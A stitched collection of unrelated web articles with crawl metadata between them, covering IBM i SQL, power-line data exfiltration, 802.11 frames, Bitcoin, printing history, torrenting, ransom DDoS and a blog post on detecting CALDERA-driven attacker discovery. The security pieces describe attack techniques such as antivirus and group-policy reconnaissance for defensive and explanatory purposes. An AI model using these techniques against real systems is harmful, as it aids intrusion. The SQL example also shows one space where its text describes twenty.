INSERT INTO ABMASTF SELECT ABTRNS, ABCUS, ABTDT, space(20 - length(trim(char(ABUBAL))))||trim(char(ABUBAL)), digits(ABNDD), space(20 - length(trim(char(ABTAMT))))||trim(char(ABTAMT)), ABREF, ABPONO, ABDIV, space(20 - length(trim(char(ABTAX))))||trim(char(ABTAX)), space(20 - length(trim(char(ABFRGT))))||trim(char(ABFRGT)), space(20 - length(trim(char(ABOTH))))||trim(char(ABOTH)), ABTTYP, ABCHKN, ABPNUM, ABRCDE, ABSLSN, ABSHPT, ABSRCI, ABTCCD, space(20 - length(trim(char(ABTCAM))))||trim(char(ABTCAM)), space(20 - length(trim(char(ABTCBA))))||trim(char(ABTCBA)), space(20 - length(trim(char(ABLCAM))))||trim(char(ABLCAM)), space(20 - length(trim(char(ABLCBA))))||trim(char(ABLCBA)), ABDIVC FROM ABmast
At this point, her SQL command cancelled with error message SQL0101.
SQL statement too long or complex. … 3 – The sum of the lengths of the non-LOB columns in a select list, table, view definition, or user defined table function is greater than 32766 or the definition contains a LOB and the sum of the lengths specified on the ALLOCATE clause for varying-length fields and the non-varying field lengths is greater than 32740. The maximum length is reduced if any of the columns are varying-length or allow null values.
I knew the field lengths did not add up to 32,766 bytes, so I contacted IBM for help with this one. Thanks to Sue Ramono and Jeff Tenner, I learned that the SPACE function returns a 4000-byte result. Sue and Jeff suggested using the SUBSTR (substring) function instead.
substr(' ',1, 20-length(trim(char(ABUBAL)))||trim(char(ABUBAL)),
The first argument is twenty spaces surrounded by single quotes. The second argument tells the position of the first blank to return (i.e., position one), and the third argument is the number of blanks to return. It’s still ugly, but SUBSTR uses less resources. (In all fairness, I should point out that SQL is designed to retrieve data, not format it.)
While I was waiting to hear back from IBM, I toyed with a user-defined function to right-adjust a value. Here is the RADJ function, hastily thrown together and unproven in production.
create function mylib/radj (inString varchar(256), inLength integer) returns varchar(256) language SQL contains SQL deterministic returns null on null input no external action begin if inLength < length(trim(inString)) then signal sqlstate '22003' set message_text = 'Length is invalid.'; end if; return (space(inLength-length(trim(inString))) concat trim(inString)); end
RADJ takes two arguments–the character value to be right-adjusted and the size of the area in which it is to be right-adjusted. I was able to run queries with many RADJ functions without getting the SQL0101 error.
SELECT radj(char(ABUBAL),20) ...
What an interesting profession! I learn something new every day. | <urn:uuid:3a9830f1-938a-4d64-aaad-52d2efa8e2e3> | CC-MAIN-2022-40 | https://www.itjungle.com/2006/10/18/fhg101806-story01/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00555.warc.gz | en | 0.77616 | 1,102 | 2.578125 | 3 |
If you have an air-gapped computer, you probably think you’re safe. You may think that barring physical access to the machine, no hacker could possibly steal the data on that machine. Unfortunately, you’d be incorrect.
Security researchers from the Ben Gurion University of the Negev, in Israel, have discovered a new way of stealing data using power lines. While that may sound like science fiction, it’s actually real and a genuine threat, even to computers thought to be highly secure.
If you’re not familiar with the term, an air gapped computer is one that is isolated from local networks and the internet. Because it’s not connected to anything, these machines have long been regarded as the ultimate in data security and are used by governments and corporations to store their most sensitive data.
Here’s what the researchers had to say about their discovery:
“As a part of the targeted attack, the adversary may infiltrate the air-gapped networks using social engineering, supply chain attacks, or malicious insiders. Note that several APTs discovered in the last decade are capable of infecting air-gapped networks (e.g. Turlal, RedOctober and Fanny).
However, despite the fact that breaching air-gapped systems has been shown feasible, the exfiltration of data from an air-gapped system remains a challenge.”
Up until now, anyway.
The researchers have dubbed this new technique “PowerHammer,” and it accomplishes the task of siphoning data from air-gapped systems by creating fluctuations in the flow of electrical current to create a Morse-code-like pattern, which can be used to create a simple binary system.
That accomplished, the only other thing that’s needed is a piece of hardware to monitor the flow of electricity as it passes through power lines and then, decode the signal. According to the research team, data transfer speeds of up to 1000bps can be achieved.
This should scare the daylights out of anyone in data security. | <urn:uuid:c5ecfacd-512c-4607-beb0-014407889d89> | CC-MAIN-2022-40 | https://dartmsp.com/can-computer-data-be-stolen-through-power-lines/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00555.warc.gz | en | 0.938091 | 431 | 3.078125 | 3 |
With the advancement of science and technology, the pace of innovation has grown as well, producing a steady stream of new tools and devices. No matter how big or small your business is, technology provides tangible and intangible benefits that help it stay profitable and meet the growing needs of customers. Technological innovation affects a company's efficiency and culture, as well as its relationships with employees, customers, and suppliers. The nature and quality of the technology used also affect the security of confidential business information.
To handle administrative tasks such as inventory, accounting, and record keeping, businesses large and small rely on computers. The birth of the Internet and online social networking sites has significantly reduced the cost of doing business, and it has also made it easier for companies to adopt management methods such as Six Sigma. Some companies have turned to outsourcing rather than hiring their own employees because of the lower costs involved. Technological innovation has had such a large impact on business that it is now impossible for companies to operate without it.
Customers are the lifeblood of a company; a business depends on its customers to survive. It is therefore important that companies not only value their customers but also build relationships with them to earn their loyalty. Only then can a company count on repeat business. Companies achieve this by providing the highest quality of customer service. Technology has changed the way companies interact with their customers, and a number of technological tools can improve customer service. Companies adopt these tools because they improve efficiency and offer a very cost-effective way to handle customer service issues such as complaints, inquiries, and online orders. Through technology, companies have moved closer to their customers.
Some of the technological tools companies can use to improve customer service are:
- Social networks: These create a virtual community between the company and its customers. Questions, inquiries, and complaints can be resolved very quickly through this platform.
- Websites: Before social networks, the website was the first point of contact between a company and its customers. Nowadays it also serves as a marketing tool.
- E-mail: E-mail is the traditional way companies communicate with their customers. This is used to inform customers about a new product / improved product; Use it as a channel for marketing campaigns; or any change within the organization. This is the best tool to achieve loyalty.
All companies realize that they do not think about the customer and can not think about marketing. One depends very much on the other. Companies use technology to improve marketing strategies. You do it the following way:
Use marketing strategies that are in line with customer expectations. This can only be achieved through the use of databases and analysis tools. Some tools that may be useful to your business are reviewed here, take a look at these: project profit academy review & Digital Worth Academy review.
Automation of most services offered by companies results in greater efficiency and effectiveness. Companies have automated most of the services that concern customers. Inquiries and questions are handled more efficiently by the software. Online shopping and commerce have been automated by electronic commerce. The websites were used to automate the first contact between the company and its customers. Customers can access more information about the business through their website.
Technology can be used to create or break a business. Social networks are the most dangerous if they are not used properly. A mistake can lead to the collapse of huge companies. Social media networks are platforms for exchanging information between the online community. Companies use social networks to create brands and interact with their customers. The trend of customer service is towards community-based technology tools like social networks.
Companies should try to build good relationships with their customers regardless of the route they are using. A dissatisfied customer is worse than a forest fire. Most customer service technologies can be used concurrently with marketing tools.
Advantages of technology for businesses:
- Relationships with customers. Technology influences the way companies communicate and build relationships with their customers. In a rapidly changing commercial environment, it is important that they interact regularly and quickly with customers to gain their trust and win customers. With the use of the Internet and social online networks, companies interact with consumers and answer all their questions about the product. Creating effective communication with clients not only creates a good relationship with them but also creates a strong public image. It enables commercial companies to reduce and reduce carbon emissions.
- Business operations. By leveraging technology innovation, entrepreneurs and entrepreneurs can better understand their cash flow, manage their inventory costs, and save time and money.
- Corporate culture The technology enables employees to communicate and interact with other employees in other countries. It creates a clique and prevents the emergence of social tension.
- Security Modern security equipment enables businesses to protect their financial information, business confidential information, and decisions.
- Research opportunities. It offers a place for studies to stay one step ahead of the competition. It enables companies to virtually travel to unknown markets. | <urn:uuid:b9ce0d82-91ef-45d1-b1d9-c510f02c2b12> | CC-MAIN-2022-40 | https://www.intellinet-tech.com/business-and-its-relationship-with-technology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00755.warc.gz | en | 0.956806 | 982 | 2.5625 | 3 |
Below shows a frame format of a Data Frame. (source IEEE 802.11-2012 standard)
The content of the address fields of data frames are dependent upon the values of the To DS and From DS fields in the Frame Control field and whether the Frame Body field contains either an MSDU (or fragment thereof) or an entire A-MSDU, as determined by the A-MSDU Present subfield of the QoS Control field.
The content of the address fields is shown in below table (source IEEE 802-11 2012 Table 8-19). Where the content of a field is shown as not applicable (N/A), the field is omitted. Note that Address 1 always holds the receiver address of the intended receiver, and that Address 2 always holds the address of the STA that is transmitting the frame.
Source Address (SA) : This is the address where the frame is sent from.
Destination Address (DA) : This is the address where the frame is being sent to.
Transmitter Address (TA) : This is the address of the station that is transmitting the RF frame.
Receiver Address (RA) : This is the address of the station that is receiving the RF frame.
Basic Service Set Identifier (BSSID) : This is the basic service set ID of the AP.
Typically all 4 address fields are used only in Wireless Distribution system (WDS) or Mesh AP back-haul scenarios. Below shows a Wireless bridge topology where you can see all the 4 address fields are being used.
Address 1: RA – 64:ae:0c:93:75:90 (AAP2 802.11 BSSID for SSID-MGMT)
Address 2: TA – a4:0c:c3:1a:ee:60 (AAP1 802.11 BSSID for SSID-MGMT)
Address 3: DA – c8:f9:f9:d7:3b:a7 (7965 MAC address)
Address 4: SA – 00:1a:e3:a7:ff:40 (vlan 2 gateway MAC in C3750)
For data frames of subtype Null (no data), CF-Ack (no data), CF-Poll (no data), and CF-Ack+CF-Poll (no data) and for the corresponding QoS data frame subtypes, the Frame Body field is null (i.e., has a length of 0 octets); these subtypes are used for MAC control purposes.
For data frames of subtypes Data, Data+CF-Ack, Data+CF-Poll, and Data+CF-Ack+CF-Poll, the Frame Body field contains all of, or a fragment of, an MSDU after any encapsulation for security.
For data frames of subtypes QoS Data, QoS Data+CF-Ack, QoS Data+CF-Poll, and QoS Data+CF-Ack+CF-Poll, the Frame Body field contains an MSDU (or fragment thereof) or A-MSDU after any encapsulation for security.
The maximum length of the Frame Body field can be determined from the maximum MSDU length plus the length of the Mesh Control field (if present) plus any overhead from encapsulation for encryption (i.e., it is always possible to send a maximum length MSDU, with any encapsulations provided by the MAC layer within a single data MPDU). When the frame body carries an A-MSDU, the size of the frame body field is limited by:
— The PHY’s maximum PLCP service data unit (PSDU) length
— If A-MPDU aggregation is used, a maximum MPDU length of 4095 octets
The duration value calculation for the data frame is based on the rules in 9.7 that determine the data rate at which the control frames in the frame exchange sequence are transmitted. If the calculated duration includes a fractional microsecond, that value is rounded up to the next higher integer. All STAs process Duration/ID field values less than or equal to 32 767 from valid data frames (without regard for the RA, DA, and/or BSSID address values that might be present in these frames) to update their NAV settings as appropriate under the coordination function rules.
1. CWAP Official Study Guide – Chapter 6
2. IEEE 802.11-2102 Standard | <urn:uuid:dbc852da-90b6-4beb-9791-4ba2621b4cb5> | CC-MAIN-2022-40 | https://mrncciew.com/2014/11/03/cwap-data-frame-address-fields/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00755.warc.gz | en | 0.821531 | 941 | 2.75 | 3 |
Wow, things change fast in the internet age. One day you’re making a phone call on a brick-like cellphone and the next day, it seems, you’re having video chats with your friends halfway around the world.
One day, you’re turning a knob to change a TV channel and the next day you’re talking to your TV set. Yet, there may be no better example than Bitcoin of how fast technology changes.
It’s so new to most of us that it’s not uncommon to hear, “What is Bitcoin?” “What is cryptocurrency?”
Of course, Bitcoin has been on everyone’s tongue lately because its value soared to incredible heights seemingly overnight. In fact, “Bitcoin billionaire” became a hot new phrase.
A unit of Bitcoin last year went from being worth $800 to more than $19,000, according to “Money Magazine.” Wow! But the floor fell out, too, dropping roughly 30 percent last month.
For most of us, though, Bitcoin is simply a currency that you can use like real money. Keep reading for three ways that you can turn Bitcoin into dollars.
What is Bitcoin?
Bitcoin is a digital currency that uses encryption to protect your money, much more so than paper money and coins. It also allows you to be somewhat anonymous when using it.
You may remember, for example, that Apple got into a heated exchange a few years ago with the U.S. government over encryption and a terrorist’s iPhone. Apple and other companies use encryption to protect your privacy with a password and scrambled data, so no one can see your information except you.
3 ways to use Bitcoin as money
So, how can you use a digital currency? It’s fairly easy to start using Bitcoin to make purchases.
If you’re like most people, you take out a credit card or debit card to make most of your purchases. Heck, these days there are banks that don’t even accept cash because of crimes like money laundering.
You may even be paying your bills digitally these days, whether you use a service like PayPal to transfer funds or your bank’s bill-pay site. Cash is still cool, but it’s a bit Old School.
You can now use a debit card to access your cryptocurrency and use it just like you would use any other payment card. There are several debit cards available, including Bitpay and CoinJar.
Many of these cards have a partnership with Visa or Mastercard. So, spend away.
There are websites like Coinbase and CoinJar where you can buy cryptocurrencies, including Bitcoin, Ethereum and Litecoin. You can also sell your cryptocurrency on these sites.
Perhaps the best part is that you can link your cryptocurrency to your bank account. So, the next time Bitcoin takes off, you can cash out. (Are you the next Bitcoin billionaire?)
You’ve probably started seeing Bitcoin ATMs where you live. Although, you may have wondered how you would use one.
For starters, you can buy Bitcoin by depositing cash into the ATM. Second, you can cash out your cryptocurrency and turn it into real cash.
Note: Beware! There can be hefty fees to use these ATMs.
12 questions you’re too embarrassed to ask about Bitcoin
Have you ever seen that funny “Today Show” clip where Katie Couric is wondering what this new thing called “email” is? It’s funny because it’s hard to remember life before email.
These days, you might be feeling like Couric did all those years ago – confused by terms like “Bitcoin” and “cryptocurrency.” Join the club! | <urn:uuid:f52b17c6-183c-4f0d-9eaf-d1da341b5a78> | CC-MAIN-2022-40 | https://www.komando.com/money-tips/how-to-convert-bitcoin-to-cash/438841/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00755.warc.gz | en | 0.934299 | 801 | 2.703125 | 3 |
A Brief History of Nineteenth Century Color Printing
We take color printing for granted in the 21st century, but we stand on the shoulders of giants, owing a debt of gratitude to artists and printers of the nineteenth century who brought exciting innovations to processes relatively unchanged since the Renaissance.
They Led the Way
Hand-colored copperplate engraving. Expensive and time consuming, copper plate engraving produced black outline illustrations which were then filled in with color by hand. This method was well suited for natural history and botanical illustrations, like this example: Curtis’s Botanical Magazine, remarkably continuously published since 1787.
Woodcutting. The very earliest printing process was achieved by cutting away unwanted parts of a piece of wood. Ink was rolled onto the woodcut and the design transferred to the paper. The earliest color example is The 1457 Mainz Psalter.
Lithography. Invented in Germany in 1798, lithography involved applying oily inks to limestone, and was the first innovation in printing since the fifteenth century. By the 1880s, chromolithography was widely used in magazines and advertising, but would soon be replaced by photographic processes in the 20th century. A good example is Victoria Regia; Or, The Great Water Lily of America by John Fisk Allen, 1854.
Nature printing. This process involved embedding a specimen (a leaf or butterfly, for example) into a lead plate and applying color. Only a few books were actually printed; the most successful being As Nature Shows Them: Moths and Butterflies of the United States,, by Sherman F. Denton, 1900.
To learn more about the history of color printing, visit Color Printing in the Nineteenth Century.
We’ve Come a Long Way Since Then
Thankfully, you won’t need to get out your carving knife and slice away at a chunk of wood to get stunning color printing results for your 21st century office. Just contact the color printing experts at 1-800 Office Solutions Technologies today! | <urn:uuid:ae45cd8d-a9e2-4077-b292-125c66a5324a> | CC-MAIN-2022-40 | https://1800officesolutions.com/a-brief-history-of-nineteenth-century-color-printing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00755.warc.gz | en | 0.947983 | 416 | 3.6875 | 4 |
More than a week after Iran said it had been the victim of another cyber attack by foreign adversaries, computer security experts around the globe are voicing their skepticism about the country’s claims.
After the Stuxnet incident last year, Iran claims it was recently hit with another cyber attack. The Iranian government said it suspected a virus called “stars“ being responsible for the attack, but did not share any information on the malware or the damage it might have caused.
“If it is real or a hoax, it is impossible to tell,“ he said. “There is a possibility that they are working with some anti-virus company under a nondisclosure agreement for analysis/remediation, something that is not uncommon.“
Even if the “stars“ virus was a genuine foreign attack, it could be created to extract information rather than do physical damage.
“It sounds more like cyber espionage than cyber sabotage,“ said Mikko Hypponen, chief research officer at F-Secure. “Cyber espionage happens all the time. Cyber sabotage doesn't.“ | <urn:uuid:04a3a165-2dc4-4b0c-93e2-f0bd02d2f4cf> | CC-MAIN-2022-40 | https://blog.executivebiz.com/2011/05/experts-doubt-irans-claims-of-being-cyber-attacked/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00755.warc.gz | en | 0.968872 | 232 | 2.640625 | 3 |
Torrenting is the act of downloading many small bits of files at the same time from different sources – it’s essentially crowd sourcing for media content. While it can seem safe under the camouflage of the enormous World Wide Web, torrenting files can be a risky endeavour and could end up getting you into trouble that you might not even realise. While the underlying BitTorrent protocol and network is not in itself illegal, the bulk of content shared via torrents are made up of files that potentially violate copyright holders’ rights. Torrenting is popular and decentralized, so it’s tempting to believe there are no consequences.
So be warned: without taking necessary precautions, careless torrenters could be in for a rude awakening. The days of high-profile lawsuits in which Hollywood studios sued college students for tens of thousands of dollars might be over, but make no mistake: copyright holders are still waging a war on piracy behind the scenes.
Torrenters can run into trouble in three main ways: legal settlements, ISP penalties, loss of privacy, and infection by virus or malware. The peer-to-peer BitTorrent network relies on users who have downloaded a file to subsequently upload it, which exposes them several vulnerabilities. Here are some dangers of torrenting to bear in mind:
If you’re torrenting illegally, whether you realise it or not, there is a chance you could get chased for copyright infringement.
Rarely does a Hollywood movie studio directly sue individuals for downloading their latest release without permission anymore. This was a common scare tactic that proved ineffective to stem the growth of BitTorrent a decade ago. Instead, the legal front was taken on by entities known as copyright trolls.
A copyright troll gets permission on behalf of the copyright holder to take legal action against people who illegally download media. The BitTorrent protocol is built in such a way that when a device connects to a torrent, it can see the IP addresses of all the other devices connected to that torrent. Everyone who is uploading or downloading that file can be targeted by a copyright troll.
The IP addresses can be traced back to internet service providers. The copyright trolls send a list of IP addresses and settlement letters to the ISPs, who in turn forward those settlement letters to their customers.
These settlement letters typically ask for a few thousand dollars if the receiver pays immediately, or else face a court battle that could cost them tens of thousands. Hundreds or thousands of these letters can be sent, and the copyright troll only needs the scare tactic to work a handful of times to make their efforts worth it.
However, courts have ruled that IP addresses do not constitute identities, so the best course of action to take if one receives a settlement letter is to ignore it. The letter most likely won’t have a name on it. If the troll receives a response, it will have an identity, which gives it more leverage.
Despite this, If you do get a letter, you know for sure you’re torrenting illegally, so stopping is the best advice; and should the situation escalate, it’s time to seek professional legal help.
Unless connected to a VPN or some other means of encryption, all of the internet traffic can and likely will be monitored by a user’s internet service provider. Internet service providers in the US are usually in league with copyright holders, don’t want to be held liable for privacy, and want to save bandwidth. For these reasons, they frown on torrenting, sometimes whether it’s legal or not.
If an ISP catches one of its customers torrenting, it’s common for them to start by sending a nasty letter. If that doesn’t work, an ISP could resort to bandwidth throttling, fines, or even account suspension and termination. Bandwidth throttling restricts the speed of an internet connection. Sometimes download speed is only restricted on certain ports (the ones used by a BitTorrent client), but some ISPs restrict all traffic.
Malware and viruses
Torrents are common sources of malware and viruses. This is especially true of software and games, which must be installed and executed. Always run virus scans and read through comments to prevent infection.
A good antivirus is key here. Some torrenters will post the results of a virus scan in the comments section of a torrent’s web page for others to see. They can’t always be trusted, however, as false positives are common and no antivirus is perfect. It’s always better to run your own scans before opening a file.
The IP addresses for every device connected to a torrent are visible to everyone else. IP addresses can be used by advertisers, hackers, and even law enforcement to target individual users.
So if you want to keep you privacy and data protected from the various threats emanating from p2p networks, you should use the entire arsenal of computer protection: latest updates for the operating system installed on your device, a strong anti-virus security suite, and encryption of your internet connection, these are the must-have things while torrenting. VPNs will help with the latter to mask your activities but they’re not foolproof with logjams, kills switch and DNS leakage common torrenting hazards and it pays to look around to find the best providers.
Popcorn Time uses torrents
Popcorn Time streams TV shows and movies in a slick, easy to use app. Many users might not even realize that video is streamed directly from torrents. Once Popcorn Time starts downloading a video to your computer, it can also start uploading it to other users.
It makes no difference to an ISP or a copyright troll whether you use Popcorn Time or ThePirateBay to watch your shows–they both constitute a copyright violation.
Some torrents carry greater risks than others
Newer and more popular releases tend to be watched more closely by copyright trolls than other torrents. A general rule of thumb is movies within 60 days of their DVD and Blu-Ray release are more heavily monitored. This is the period during which movies and TV shows make the majority of their profit.
Popular torrents give copyright trolls a greater range of IP addresses to target, so they’re a better hunting ground for victims. Don’t be tempted to jump on the bandwagon and download the most popular torrents.
Don’t let Netflix VPN ban drive you to illegal torrenting
Netflix users outside of the US are now prohibited from using a proxy to access TV shows and movies that aren’t available through the service in their own countries. Shortly after the company’s global rollout, it began blocking proxy connections no matter where they originated. The purpose is to honor content licensing agreements with copyright holders, but the result was many Netflix subscribers being stuck with a smaller selection of shows.
Unsatisfied with the reduced catalog, many users resort to torrents to fill the gaps. But know that not all VPN services have surrendered to Netflix’s new policies. Some VPNs can still access US Netflix and other content limited to specific countries. Unlike torrenting copyrighted material, bypassing a geo-lock with a VPN is not illegal. Certain Smart DNS proxy services are offer alternate, viable workarounds and are also perfectly legal.
Whether you are torrenting or bypassing the Netflix firewall, a VPN is always a good idea.
Use a VPN
Don’t pirate. That’s the simplest way to avoid paying settlements and suffering ISP penalties. You can find a list of free and legal torrenting sites here. But even if you think what you’re downloading is within the law, the best way to avert these risks is to use a VPN.
Short for virtual private network, a VPN encrypts all of a device’s internet traffic and routes it through a location of the user’s choosing. This prevents ISPs from deciphering traffic and masks the device’s IP address so that copyright trolls can’t trace it back. | <urn:uuid:809df77b-ef31-49a7-b316-76e8dea9cd31> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/torrenting-know-risks-take/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00755.warc.gz | en | 0.933088 | 1,649 | 2.515625 | 3 |
Thought leadership. Threat analysis. Cybersecurity news and alerts.
More and more hackers are using distributed denial-of-service (DDoS) attacks to hold businesses to ransom.
In June 2021, the Canadian Centre for Cyber Security issued an alert to raise awareness of increased DDoS extortion activity. One notable case occurred in September of that year, with ITWorld Canada reporting that a voice-over-IP provider in Canada had been targeted.
The perpetrator was believed to have demanded one bitcoin (equal to around $45,000) as payment to end the assault. Numerous other companies have been hit since.
With ransom DDoS incidents becoming more common, it’s crucial that organizations understand how serious this threat is, how it could affect them, and what defensive measures they can use to stay safe.
But before we explore what a ransom DDoS attack is and how you can stop it, we’ll cover the basics.
What is a DDoS Attack?
A DDoS attack floods a specific network, server, website, or application with an overwhelming amount of traffic. This disrupts the normal flow of traffic and prevents the target from operating as it should.
Perpetrators tend to use botnets to launch DDoS attacks. A botnet is a network comprising many connected systems, all of which have been infected with malware, to generate disruptive traffic. These devices may be computers, IoT (Internet of things) gadgets, or mobile devices.
A hacker can leverage these “zombie” systems to attack their target with enough traffic to cause serious problems. Attackers may aim to:
But with ransom DDoS attacks, hackers are driven more by greed than anything else.
What is a Ransom DDoS Attack?
A ransom DDoS attack (often referred to as a RDDoS attack) is essentially the same, but with a few key differences. The attacker’s goal is to extort money from the target through threats and even brief demonstrations of their power.
A hacker may launch a DDoS attack against a business then contact the victims to demand payment. They will expect the target to pay the ransom, and if they remain unpaid, the attacker will continue the DDoS assault.
Alternatively, hackers may threaten the target before they begin the attack. Their objective will be to inspire panic in the potential victims and receive money without needing to act.
However, an inexperienced or unequipped perpetrator may lack the resources or knowhow to follow through on their threat. In this case, an organization could emerge from the incident unscathed even if they refuse to pay the ransom.
How Does a Ransom DDoS Attack Disrupt Businesses?
A ransom DDoS attack could disrupt your business in various ways, assuming the perpetrator launches the attack instead of simply issuing a threat.
Preventing an attack, and being prepared to handle one just in case, is vital to reduce your risk of experiencing these issues.
What Can You Do To Prevent a Ransom DDoS Attack?
Keep the following measures in mind to help prevent a ransom DDoS attack against your organization:
Refuse to Pay the Ransom
Your first instinct may be to pay the ransom, but you have no way of knowing whether that will stop the attack. It may continue, or the perpetrator could retarget your business again because they know you’re likely to pay a second time.
Train Employees to Handle Threats Responsibly
Educate your workers on what a ransom DDoS attack involves, how they usually unfold, and what actions to take if they receive a threatening message. They should know who to report an incident to and how to recognize early signs of an attack.
Look Out for Warning Signs of Impending Attacks
Common early signs of a DDoS attack include:
These could indicate other problems, too, such as outdated equipment. However, it may be best to have any of these signs investigated by cybersecurity specialists just in case.
Ensure Your Security Measures are Updated and Effective
If you haven’t updated your firewalls and other IT security measures in a while, review them to identify potential weaknesses. Outdated cybersecurity software may lack the features to protect your business.
Work with Professional Cybersecurity Specialists
Reviewing, updating, and testing your cybersecurity setup is complicated. But it’s critical to reduce your risk of being affected by a ransom DDoS attack. For many companies in Canada, the simplest way to combat threats is to work with a team of cybersecurity professionals.
At The Driz Group, we’re dedicated to providing unparalleled cybersecurity solutions for businesses in all sectors.
Our experienced, trained, reliable team will perform a comprehensive IT audit and vulnerability assessment to accurately determine your unique security requirements. And we’ll implement the best security available to always defend your organization.
Start protecting your business — schedule your free consultation with The Driz Group today.
Steve E. Driz, I.S.P., ITCP | <urn:uuid:ac7ec303-b415-46ab-8d1c-5253d804767e> | CC-MAIN-2022-40 | https://www.drizgroup.com/driz_group_blog/archives/02-2022 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00155.warc.gz | en | 0.941323 | 1,047 | 3.078125 | 3 |
Malware of the Day – Malware Techniques: Discovery and Information Gathering
What is Malware of the Day?
“Malware”: Various Payloads Delivered via CALDERA
Traffic Type: Generic
Connection Type: HTTP, TCP
C2 Platform: CALDERA
Origin of Sample: https://github.com/mitre/caldera
Host Payload Delivery Method: Powershell
Target Host/Victim: 10.0.0.60 – Windows 10 x64
C2 Server: 18.104.22.168
Beacon Timing: N/A
Today our focus is on identifying the anomalous network behavior that results from an adversary snooping around our network. We are using AC-Hunter/RITA and BeaKer as our intrusion detection tools to examine traffic generated by the CALDERA software. CALDERA is an open-source C2 framework that makes it incredibly easy to automate and/or manually run a variety of exploits on a remote system.
In the early stages of a cyber attack it is essential for the adversary to get to know the layout of the digital landscape they have infiltrated. This includes discovering accounts and domain controllers, learning the details of the target’s network configuration, finding injectable processes, etc. Armed with this information, an adversary can make more educated decisions about how to act during the remainder of the engagement.
This phase of an attack and the techniques therein fall under the MITRE ATT&CK category of Discovery. The adversary will often use native operating-system tools (e.g., Powershell) to collect information and explore what they can control and exploit on the compromised host or within the surrounding network.
Here are several examples (among many) of what one can learn from some simple Powershell commands.
Discovering what antivirus software is running on the system. This information helps the adversary with defense evasion and with deciding which further exploits are most likely to be successful.
Permissions group discovery. Gpresult displays information about the group policy objects applied to the machine and user, such as the last time group policy was applied, which domain controller it was applied from, and which security groups the user and computer are members of. This information is valuable to an attacker, who can use it to make better-informed decisions about how to move around the network.
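To see why this output matters to an attacker, consider how little code it takes to triage it. The sketch below parses a `gpresult /r`-style excerpt for group memberships; the excerpt is invented for illustration, and real gpresult output varies by system and locale:

```python
# Invented excerpt of "gpresult /r" output -- real output varies by
# system and locale; this only illustrates the triage step.
sample = """\
USER SETTINGS
    The user is a part of the following security groups
    ---------------------------------------------------
        Domain Users
        Remote Desktop Users
        Administrators
"""

lines = sample.splitlines()
# Find the header line, then skip it and the dashed separator under it
start = next(i for i, line in enumerate(lines) if "security groups" in line)
groups = [line.strip() for line in lines[start + 2:] if line.strip()]
print(groups)  # -> ['Domain Users', 'Remote Desktop Users', 'Administrators']
```

An attacker who spots "Administrators" in that list knows the compromised account is worth far more than a standard user's.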
How can we tell if an adversary is engaging in this type of behavior?
Fortunately for us, in order for the adversary to obtain and make use of any information, they have to get that data from a compromised system over to their servers, which leaves a digital footprint. This most often happens over the internet although sending in a spy with a bag full of USB drives is also possible.
The screenshot above is taken from AC-Hunter’s long connections screen. The top result shows a connection to an external IP that was open for just under 24 hours. There are several obvious factors that make this connection suspicious:
- The persistence of the connection does not resemble human activity. Most user-created connections will not last more than a few hours.
- The connection goes directly to an IP address that does not appear to have an associated domain name. Human-made HTTP requests will almost always be to a domain rather than an IP address (there will also typically be a DNS request present for that domain).
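These two heuristics are easy to express in code. The sketch below is a simplified illustration with invented records and thresholds; it is not AC-Hunter's actual scoring logic:

```python
# One record per observed connection; "dns_seen" means a DNS lookup for the
# destination preceded the connection. All values here are invented.
LONG_CONN_THRESHOLD = 4 * 3600  # seconds; most human activity is shorter

connections = [
    {"src": "10.0.0.60", "dst": "18.104.22.168", "duration": 86000, "dns_seen": False},
    {"src": "10.0.0.60", "dst": "142.250.80.46", "duration": 120, "dns_seen": True},
]

def is_suspicious(conn):
    # Long-lived AND straight to a bare IP with no DNS lookup first
    return conn["duration"] > LONG_CONN_THRESHOLD and not conn["dns_seen"]

flagged = [c["dst"] for c in connections if is_suspicious(c)]
print(flagged)  # -> ['18.104.22.168']
```

Either heuristic alone produces false positives (software updaters, streaming), which is why combining them, as above, narrows the hunt considerably.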
Switching to the second view in the AC-Hunter Long Connections tab shows us the total time two hosts were connected (all connections combined). It also shows the total bytes transferred between the hosts:
The amount of data transferred between the hosts (140 MB) is another indicator that this connection should be further investigated. At this point we have identified a potential threat and we can perform further forensic analysis to determine what the adversary might have been doing.
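The roll-up shown in this second view — total connection time and total bytes per host pair — is conceptually a simple aggregation. A sketch with invented per-connection records:

```python
from collections import defaultdict

# Invented per-connection records: (src, dst, seconds open, bytes transferred).
# AC-Hunter computes the same roll-up from Zeek connection logs.
conns = [
    ("10.0.0.60", "18.104.22.168", 3600, 20_000_000),
    ("10.0.0.60", "18.104.22.168", 82000, 120_000_000),
    ("10.0.0.60", "142.250.80.46", 30, 50_000),
]

totals = defaultdict(lambda: [0, 0])  # (src, dst) -> [total_seconds, total_bytes]
for src, dst, seconds, nbytes in conns:
    totals[(src, dst)][0] += seconds
    totals[(src, dst)][1] += nbytes

# Host pairs sorted by total bytes, largest first -- the C2 pair tops the list
for (src, dst), (secs, nbytes) in sorted(totals.items(), key=lambda kv: -kv[1][1]):
    print(f"{src} -> {dst}: {secs / 3600:.1f} h, {nbytes / 1e6:.0f} MB")
```

Aggregating per host pair matters because an adversary can tear down and re-establish sessions to stay under any single-connection threshold; the totals still give them away.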
Our open-source tool RITA can also be used for a similar analysis. The screenshot above shows the results from running the command:
rita show-long-connections database-name -H
